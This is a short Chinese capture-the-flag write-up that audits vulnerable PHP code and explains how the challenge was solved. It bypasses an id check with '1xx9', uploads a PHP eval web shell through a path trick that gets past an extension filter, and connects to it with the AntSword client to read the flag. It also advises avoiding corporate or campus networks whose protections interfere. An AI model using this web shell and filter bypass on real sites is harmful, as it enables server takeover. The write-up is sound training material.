进入环境
进入项目管理
点击进行访问
是一堆代码进行审计
<?php
session_start();
if (!isset($_GET[page])) {
show_source(__FILE__);
die();
}
if (isset($_GET[page]) && $_GET[page] != 'index.php') {
include('flag.php');
}else {
header('Location: ?page=flag.php');
}如果传入的参数page的值不是index.php,则包含flag.php,否则重定向到?page=flag.php
<?php
if ($_SESSION['admin']) {
$con = $_POST['con'];
$file = $_POST['file'];
$filename = "backup/".$file;
if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
die("Bad file extension");
}else{
chdir('uploaded');
$f = fopen($filename, 'w');
fwrite($f, $con);
fclose($f);
}
}
?>POST提交con和file两个参数
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
include 'config.php';
$id = mysql_real_escape_string($_GET[id]);
$sql="select * from cetc007.user where id='$id'";
$result = mysql_query($sql);
$result = mysql_fetch_object($result);
} else {
$result = False;
die();
}
if(!$result)die("<br >something wae wrong ! <br>");
if($result){
echo "id: ".$result->id."</br>";
echo "name:".$result->user."</br>";
$_SESSION['admin'] = True;
}
?>参考up主@愚公搬代码
需要获取一个id参数, 并且id不为1,且最后一位等于9
floatval 函数用于获取变量的浮点值
?page=flag.php&id=1xx9
上传木马
con=<?php @eval($_POST[cmd]);?>&file=test.php/1.php/..
访问/uploaded/backup/目录,发现上传成功
连接蚁剑
注意:点开代理设置选择不使用代理,电脑连接的网络不要是校园网或者公司网络,因为一般像这种企业级的wifi都会在顶部做一些防护手段来保证安全性。所以可以自己开热点进行连接。
点击测试连接,显示成功,点击添加,右键进入文件管理
cyberpeace{7720e85e876c98f3fb088ebd5dcaff1e}